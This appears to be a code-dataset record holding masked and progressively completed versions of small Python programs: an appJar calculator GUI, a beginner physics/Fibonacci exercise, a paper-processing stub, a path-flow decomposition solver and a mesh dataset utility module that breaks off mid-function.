{ "blob_id": "084299da1c2f41de96e60d37088466c7b61de38e", "index": 9750, "step-1": "<mask token>\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-3": "<mask token>\napp = gui('Calculator', '560x240')\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = ''\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-4": "from appJar import gui\napp = gui('Calculator', '560x240')\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = ''\n\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if btn == 'Add':\n calc = 'a'\n if btn == 'Substract':\n calc = 's'\n if btn == 'Multiply':\n calc = 'm'\n if btn == 'Divide':\n calc = 'd'\n app.clearEntry('Number')\n\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n inputNumber()\n if calc == 'a':\n result = n1 + n2\n if calc == 's':\n result = n1 - n2\n if calc == 'm':\n result = n1 * n2\n if calc == 'd':\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox('DivisionByZero', \"You can't divide by Zero.\")\n app.clearEntry('Number')\n app.setLabel('Result', result)\n\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = ''\n\n\ndef inputNumber():\n global n1, n2, isFirst\n if isFirst:\n n1 = app.getEntry('Number')\n isFirst = False\n else:\n n2 = app.getEntry('Number')\n isFirst = True\n\n\napp.setStretch('column')\napp.setSticky('')\napp.setResizable(True)\napp.addNumericEntry('Number')\napp.setEntryDefault('Number', 'Enter Number')\napp.addButtons(['Add', 'Substract', 'Multiply', 'Divide'], doMath)\napp.addButtons(['Calculate!', 'clearOut'], [calculate, clearOut])\napp.setButton('clearOut', 'C')\napp.addEmptyLabel('Result')\napp.go()\n", "step-5": "from appJar import gui\n\napp = gui(\"Calculator\", \"560x240\")\n\n### FUNCTIONS ###\n\nn1, n2 = 0.0, 0.0\nresult = 0.0\nisFirst = True\ncalc = \"\"\n\ndef doMath(btn):\n global result, n1, n2, isFirst, calc\n\n inputNumber()\n\n if(btn == \"Add\"): calc = \"a\"\n if(btn == \"Substract\"): calc = \"s\"\n if(btn == \"Multiply\"): calc = \"m\"\n if(btn == \"Divide\"): calc = \"d\"\n\n app.clearEntry(\"Number\")\n\ndef calculate(btn):\n global result, n1, n2, isFirst, calc\n\n inputNumber()\n\n if(calc == 'a'): result = n1 + n2\n if(calc == 's'): result = n1 - n2\n if(calc == 'm'): result = n1 * n2\n if(calc == 'd'):\n try:\n result = n1 / n2\n except ZeroDivisionError:\n clearOut(btn)\n app.errorBox(\"DivisionByZero\", \"You can't divide by Zero.\")\n\n app.clearEntry(\"Number\")\n app.setLabel(\"Result\", result)\n\ndef clearOut(btn):\n global result, n1, n2, isFirst, calc\n n1, n2 = 0.0, 0.0\n result = 0.0\n isFirst = True\n calc = \"\"\n\ndef inputNumber():\n global n1, n2, isFirst\n\n if(isFirst):\n n1 = app.getEntry(\"Number\")\n isFirst = False\n else:\n n2 = app.getEntry(\"Number\")\n isFirst = True\n\n\n### FUNCTIONS ###\n\napp.setStretch(\"column\")\napp.setSticky(\"\")\napp.setResizable(True)\napp.addNumericEntry(\"Number\")\napp.setEntryDefault(\"Number\", \"Enter Number\")\n\napp.addButtons([\"Add\", \"Substract\", \"Multiply\", \"Divide\"], doMath)\napp.addButtons([\"Calculate!\", \"clearOut\"], [calculate, clearOut])\napp.setButton(\"clearOut\", \"C\")\n\napp.addEmptyLabel(\"Result\")\n\napp.go()\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> def ep(m, h, el, g=9.8): E = m * h * g if E < el: print('le plus grand est : el') else: print('le plus grand est : E') <|reserved_special_token_0|> def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> def ep(m, h, el, g=9.8): E = m * h * g if E < el: print('le plus grand est : el') else: print('le plus grand est : E') ep(3, 4, 5) def fibonaci(n): for i in range(0, n): j = 1 i = i + j j = i return fibonaci <|reserved_special_token_1|> # fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel def ep (m,h,el,g=9.8): E=m*h*g if E<el: print ("le plus grand est : el") else: print ("le plus grand est : E") ep(3,4,5) #fontion fibonaci 0 1 1 2 3 5 8 13 def fibonaci(n): for i in range(0,n,): j= 1 i = i + j j=i return fibonaci
flexible
{ "blob_id": "869284fa531a93c1b9812ed90a560d0bb2f87e97", "index": 255, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-3": "def ep(m, h, el, g=9.8):\n E = m * h * g\n if E < el:\n print('le plus grand est : el')\n else:\n print('le plus grand est : E')\n\n\n<mask token>\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-4": "def ep(m, h, el, g=9.8):\n E = m * h * g\n if E < el:\n print('le plus grand est : el')\n else:\n print('le plus grand est : E')\n\n\nep(3, 4, 5)\n\n\ndef fibonaci(n):\n for i in range(0, n):\n j = 1\n i = i + j\n j = i\n return fibonaci\n", "step-5": "# fonction pour voir quel est le plus grand entre l'energie limite et l'enerve potentiel\ndef ep (m,h,el,g=9.8):\n E=m*h*g\n if E<el:\n print (\"le plus grand est : el\")\n else:\n print (\"le plus grand est : E\")\n\nep(3,4,5)\n\n#fontion fibonaci 0 1 1 2 3 5 8 13\n\ndef fibonaci(n):\n for i in range(0,n,):\n j= 1\n i = i + j\n j=i\n return fibonaci\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from paper_processor import PaperProcessor import logging logging.basicConfig( level=logging.DEBUG, format='%(asctime)s - %(levelname)s - %(message)s') q = "levamisole inhibitor" p = PaperProcessor(q)
normal
{ "blob_id": "96e64b715dbfc1c59ba44d608ad2694b165017b5", "index": 1975, "step-1": "<mask token>\n", "step-2": "<mask token>\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\n<mask token>\n", "step-3": "<mask token>\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\nq = 'levamisole inhibitor'\np = PaperProcessor(q)\n", "step-4": "from paper_processor import PaperProcessor\nimport logging\nlogging.basicConfig(level=logging.DEBUG, format=\n '%(asctime)s - %(levelname)s - %(message)s')\nq = 'levamisole inhibitor'\np = PaperProcessor(q)\n", "step-5": "from paper_processor import PaperProcessor\nimport logging\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s - %(levelname)s - %(message)s')\nq = \"levamisole inhibitor\"\np = PaperProcessor(q)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#! /usr/bin/env python3 # # This file is part of Toboggan, https://github.com/TheoryInPractice/Toboggan/, # and is Copyright (C) North Carolina State University, 2017. It is licensed # under the three-clause BSD license; see LICENSE. # # -*- coding: utf-8 -*- # python libs import sys import itertools # local imports from toboggan.dp import solve as solve_dp # Print iterations progress def print_progress(iteration, total, prefix='', suffix='', decimals=1, bar_length=100): """ Call in a loop to create terminal progress bar. @params: iteration - Required : current iteration (Int) total - Required : total iterations (Int) prefix - Optional : prefix string (Str) suffix - Optional : suffix string (Str) decimals - Optional : positive number of decimals in percent complete (Int) bar_length - Optional : character length of bar (Int) """ str_format = "{0:." + str(decimals) + "f}" percents = str_format.format(100 * (iteration / float(total))) filled_length = int(round(bar_length * iteration / float(total))) bar = '█' * filled_length + '-' * (bar_length - filled_length) sys.stdout.write('\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)), if iteration == total: sys.stdout.write('\n') sys.stdout.flush() def is_feasible(weights, flow, max_weight): """Test whether set of guessed weights is feasible.""" # In the following, we replace very occurenve of 'None' in the # weight-array by the minimum/maximum possible value (given by the # last/the first # non-None value next to it). min_weights = [1] + weights max_weights = [max_weight] + list(reversed(weights)) for i in range(1, len(min_weights)): min_weights[i] = min_weights[i] if min_weights[i] else min_weights[i-1] max_weights[i] = max_weights[i] if max_weights[i] else max_weights[i-1] min_weights = min_weights[1:] max_weights = list(reversed(max_weights[1:])) # If the flow value lies outside of the sum-of-weight estimates, # the current guessed set of weights is infeasible. return sum(min_weights) <= flow and sum(max_weights) >= flow def solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float('inf'), scoring="sink distance"): """Solve the provided instance of path-flow decomposition.""" flow = instance.flow k = instance.k # quit right away if the instance has weight bounds that can't be satisfied if instance.has_bad_bounds(): return set() # if k equals the size of the largest edge cut, the weights are # predetermined if instance.k == max(len(C) for C in instance.edge_cuts): largest_cut = max(instance.edge_cuts, key=len) # Important: path weights must be sorted, otherwise our # subsequent optimizations will remove this constraint. weights = list(sorted(w for _, w in largest_cut)) return solve_dp(instance, silent=True, guessed_weights=weights) max_weight = instance.max_weight_bounds[1] feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)) if not silent: print(instance.weights, feasible_weights) # figure out whether we get the first or last positions for free largest_free = False smallest_free = False # check largest weight first if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]: largest_free = True largest = instance.max_weight_bounds[0] if min(instance.weights) == 1: smallest_free = True smallest = 1 positions = list(range(int(smallest_free), k-int(largest_free))) # iterate over the number of unguessed weights for diff in range(k+1): if not silent: print("Diff =", diff) # iterate over positions of guessed weights. We want them to be # ordered, but choose the smallest first to be removed for rev_indices in itertools.combinations(reversed(positions), k-diff): indices = list(reversed(rev_indices)) p = len(indices) # when k-1 values are determined, it also determines the kth value if p == k-1: continue # iterate over choices for those guessed weights for chosen_weights in itertools.combinations(feasible_weights, p): weights = [None] * k # assign the chosen weights to the guessed positions for p, w in zip(indices, chosen_weights): weights[p] = w # add in free values if smallest_free: weights[0] = smallest if largest_free: weights[k-1] = largest # quit if this didn't work if not is_feasible(weights, flow, max_weight): continue if not silent: print("Trying weights", weights) sol = solve_dp(instance, silent=True, guessed_weights=weights) if len(sol) > 0: if not silent: try: for s in sol: print(s, sum(s.path_weights), flow) except AttributeError: print("Unterdetermined solution") return sol
normal
{ "blob_id": "1b4c9841fd10d065983974e93fe5dcbe048c1281", "index": 4180, "step-1": "<mask token>\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-3": "<mask token>\n\n\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = '{0:.' + str(decimals) + 'f}'\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)\n ),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-4": "import sys\nimport itertools\nfrom toboggan.dp import solve as solve_dp\n\n\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = '{0:.' + str(decimals) + 'f}'\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%', suffix)\n ),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[\n i - 1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[\n i - 1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1, max_weight_upper=float\n ('inf'), scoring='sink distance'):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n if instance.has_bad_bounds():\n return set()\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight, instance.weights)\n )\n if not silent:\n print(instance.weights, feasible_weights)\n largest_free = False\n smallest_free = False\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n positions = list(range(int(smallest_free), k - int(largest_free)))\n for diff in range(k + 1):\n if not silent:\n print('Diff =', diff)\n for rev_indices in itertools.combinations(reversed(positions), k - diff\n ):\n indices = list(reversed(rev_indices))\n p = len(indices)\n if p == k - 1:\n continue\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k - 1] = largest\n if not is_feasible(weights, flow, max_weight):\n continue\n if not silent:\n print('Trying weights', weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print('Unterdetermined solution')\n return sol\n", "step-5": "#! /usr/bin/env python3\n#\n# This file is part of Toboggan, https://github.com/TheoryInPractice/Toboggan/,\n# and is Copyright (C) North Carolina State University, 2017. It is licensed\n# under the three-clause BSD license; see LICENSE.\n#\n# -*- coding: utf-8 -*-\n# python libs\nimport sys\nimport itertools\n# local imports\nfrom toboggan.dp import solve as solve_dp\n\n\n# Print iterations progress\ndef print_progress(iteration, total, prefix='', suffix='', decimals=1,\n bar_length=100):\n \"\"\"\n Call in a loop to create terminal progress bar.\n\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent\n complete (Int)\n bar_length - Optional : character length of bar (Int)\n \"\"\"\n str_format = \"{0:.\" + str(decimals) + \"f}\"\n percents = str_format.format(100 * (iteration / float(total)))\n filled_length = int(round(bar_length * iteration / float(total)))\n bar = '█' * filled_length + '-' * (bar_length - filled_length)\n\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percents, '%',\n suffix)),\n\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\ndef is_feasible(weights, flow, max_weight):\n \"\"\"Test whether set of guessed weights is feasible.\"\"\"\n # In the following, we replace very occurenve of 'None' in the\n # weight-array by the minimum/maximum possible value (given by the\n # last/the first\n # non-None value next to it).\n min_weights = [1] + weights\n max_weights = [max_weight] + list(reversed(weights))\n for i in range(1, len(min_weights)):\n min_weights[i] = min_weights[i] if min_weights[i] else min_weights[i-1]\n max_weights[i] = max_weights[i] if max_weights[i] else max_weights[i-1]\n min_weights = min_weights[1:]\n max_weights = list(reversed(max_weights[1:]))\n\n # If the flow value lies outside of the sum-of-weight estimates,\n # the current guessed set of weights is infeasible.\n return sum(min_weights) <= flow and sum(max_weights) >= flow\n\n\ndef solve(instance, silent=True, max_weight_lower=1,\n max_weight_upper=float('inf'), scoring=\"sink distance\"):\n \"\"\"Solve the provided instance of path-flow decomposition.\"\"\"\n flow = instance.flow\n k = instance.k\n\n # quit right away if the instance has weight bounds that can't be satisfied\n if instance.has_bad_bounds():\n return set()\n\n # if k equals the size of the largest edge cut, the weights are\n # predetermined\n if instance.k == max(len(C) for C in instance.edge_cuts):\n largest_cut = max(instance.edge_cuts, key=len)\n # Important: path weights must be sorted, otherwise our\n # subsequent optimizations will remove this constraint.\n weights = list(sorted(w for _, w in largest_cut))\n return solve_dp(instance, silent=True, guessed_weights=weights)\n\n max_weight = instance.max_weight_bounds[1]\n feasible_weights = list(filter(lambda w: w <= max_weight,\n instance.weights))\n\n if not silent:\n print(instance.weights, feasible_weights)\n\n # figure out whether we get the first or last positions for free\n largest_free = False\n smallest_free = False\n # check largest weight first\n if instance.max_weight_bounds[0] == instance.max_weight_bounds[1]:\n largest_free = True\n largest = instance.max_weight_bounds[0]\n if min(instance.weights) == 1:\n smallest_free = True\n smallest = 1\n\n positions = list(range(int(smallest_free), k-int(largest_free)))\n\n # iterate over the number of unguessed weights\n for diff in range(k+1):\n if not silent:\n print(\"Diff =\", diff)\n # iterate over positions of guessed weights. We want them to be\n # ordered, but choose the smallest first to be removed\n for rev_indices in itertools.combinations(reversed(positions), k-diff):\n indices = list(reversed(rev_indices))\n p = len(indices)\n # when k-1 values are determined, it also determines the kth value\n if p == k-1:\n continue\n # iterate over choices for those guessed weights\n for chosen_weights in itertools.combinations(feasible_weights, p):\n weights = [None] * k\n\n # assign the chosen weights to the guessed positions\n for p, w in zip(indices, chosen_weights):\n weights[p] = w\n\n # add in free values\n if smallest_free:\n weights[0] = smallest\n if largest_free:\n weights[k-1] = largest\n\n # quit if this didn't work\n if not is_feasible(weights, flow, max_weight):\n continue\n\n if not silent:\n print(\"Trying weights\", weights)\n sol = solve_dp(instance, silent=True, guessed_weights=weights)\n if len(sol) > 0:\n if not silent:\n try:\n for s in sol:\n print(s, sum(s.path_weights), flow)\n except AttributeError:\n print(\"Unterdetermined solution\")\n return sol\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
__doc__ = """ Dataset Module Utilities - mostly for handling files and datasets """ import glob import os import random from meshparty import mesh_io # Datasets ----------------------- SVEN_BASE = "seungmount/research/svenmd" NICK_BASE = "seungmount/research/Nick/" BOTH_BASE = "seungmount/research/nick_and_sven" DATASET_DIRS = { "orig_full_cells": [f"{SVEN_BASE}/pointnet_axoness_gt_180223/"], "soma_vs_rest": [f"{SVEN_BASE}/pointnet_soma_masked_180401"], "orphans": [f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/", f"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/"], "orphans2": [f"{NICK_BASE}/pointnet/orphan_dataset/train_val_axons", f"{NICK_BASE}/pointnet/orphan_dataset/train_val_dends/"], "orphan_axons": [f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/"], "orphan_axons_refined": [(f"{SVEN_BASE}" "/pointnet_orphan_axons_gt_180308_refined/")], "pinky100_orphan_dends": [(f"{BOTH_BASE}/data/180920_orphan_dends/")], "orphan_axons_pinky100": [(f"{SVEN_BASE}/InhAnalysis/meshes_put_axon/")], "fish_refined": [f"{SVEN_BASE}/180831_meshes_ashwin_refined/"], "full_cells_unrefined": [(f"{SVEN_BASE}" "/pointnet_full_semantic_labels" "_masked_180401")], "full_cells_refined": [(f"{SVEN_BASE}" "/pointnet_full_semantic_labels" "_masked_180401_refined/")], "pinky100_orphan_dend_features": [(f"{BOTH_BASE}" "/nick_archive/p100_dend_outer" "/inference/proj32/")], "pinky100_orphan_dend_features_32": [(f"{BOTH_BASE}" "/nick_archive/p100_dend_outer_32" "/inference/")], "default": [f"{SVEN_BASE}/pointnet_axoness_gt_rfc_based_masked_180322/", f"{SVEN_BASE}/pointnet_orphan_axons_gt_180308/", f"{SVEN_BASE}/pointnet_orphan_dendrites_gt_180308/"] } # -------------------------------- def fetch_dset_dirs(dset_name=None): """ Finds the global pathname to a list of directories which represent a dataset by name. """ assert (dset_name is None) or (dset_name in DATASET_DIRS), "invalid name" dset_name = "default" if dset_name is None else dset_name home = os.path.expanduser("~") return list(os.path.join(home, d) for d in DATASET_DIRS[dset_name]) def files_from_dir(dirname, exts=["obj", "h5"]): """ Searches a directory for a set of extensions and returns the files matching those extensions, sorted by basename """ filenames = list() for ext in exts: ext_expr = os.path.join(dirname, f"*.{ext}") filenames.extend(glob.glob(ext_expr)) return sorted(filenames, key=os.path.basename) def split_files(filenames, train_split=0.8, val_split=0.1, test_split=0.1, seed=None): if seed is not None: random.seed(seed) # Normalizing splits for arbitrary values total = train_split + val_split + test_split train_split = train_split / total val_split = val_split / total test_split = test_split / total n_train = round(train_split * len(filenames)) n_val = round(val_split * len(filenames)) permutation = random.sample(filenames, len(filenames)) train_files = permutation[:n_train] val_files = permutation[n_train:(n_train+n_val)] test_files = permutation[(n_train+n_val):] return train_files, val_files, test_files # Helper functions for testing (e.g. sample.py) def pull_n_samples(dset, n): """Pulls n random samples from a dataset object""" return list(dset[i] for i in random.sample(range(len(dset)), n)) def save_samples(samples, output_prefix="sample"): """Saves a list of samples to ply files (with h5 labels)""" for (i, vertices) in enumerate(samples): 